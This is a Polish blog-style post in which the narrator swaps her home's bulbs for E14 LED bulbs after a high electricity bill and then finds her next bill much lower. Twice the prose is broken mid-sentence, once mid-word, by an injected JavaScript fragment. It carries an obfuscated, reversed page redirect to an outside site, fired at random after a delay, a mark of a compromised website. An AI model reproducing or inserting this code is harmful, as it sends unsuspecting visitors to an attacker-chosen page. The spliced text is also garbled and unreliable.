Dobre i energooszczędne żarówki

Dwa miesiące temu otrzymałam bardzo wysoki rachunek za prąd. nie wiedziałam co się stało, że mam zapłacić aż tyle pieniędzy. Jak się okazało tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to wszystko dlatego bo teraz już po południem jest ciemno i ja ciągle miałam wszędzie zapalone światła. Zawsze staram się żyć na co dzień dosyć skromnie.

Zakup żarówek led do mieszkania

żarówki led e14Dlatego też ten rachunek zrobił na mnie tak wielkie wrażenie. Kolega z pracy powiedział mi, że pewnie mam w domu zwykłe żarówki i dlatego też tyle płacę. Powiedział mi żebym jak najszybciej wymieniła wszystkie żarówki na ledowe, które pobierają mniej prący nawet kilkanaście razy i tym samym są bardziej ekologiczne a także oszczędniejsze. Nie chciałam czekać ani dnia dłużej z tą zmianą. Chciałam jak najszybciej zacząć oszczędzać. Po pracy pojechałam więc do sklepu gdzie takie rzeczy mogłam dostać. Nie znałam się na rodzajach żarówek dlatego też poprosiłam o pomoc sprzedawcę. Chciałam żeby ten pan doradził mi jakie będzie najlepiej kupić. I pan pokazał mi żarówki led e14, które jego zdaniem były najbardziej niezawodne i do tego były też w atrakcyjnej cenie. Zdecydowałam się je kupić. Wzięłam ich dwanaście. Chciałam żeby od razu wymienić te stare żarówki w całym mieszkaniu. Po ich zamontobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}towaniu miałam wrażenie, że jest wręcz teraz jaśniej niż wcześniej. A jednak te żarówki były energooszczędne i nie musiałam się aż tak bardzo martwić o pobór przez nie prądu. Mogłam żałować tylko tego, że tak późno zdecydowałam się na tą zmianę.

Miałam jednak nadzieję, że następny rachunek za energię będzie już niższy. I gdy go dostałam zdziwiłam się bardzo. Bo kwota na nim była dużo niższa. Ja nie spodziewałam się aż takiej różnicy. A przecież przez ten cały czas jakoś specjalnie nie oszczędzałam i zapalałam światło jak do tej pory.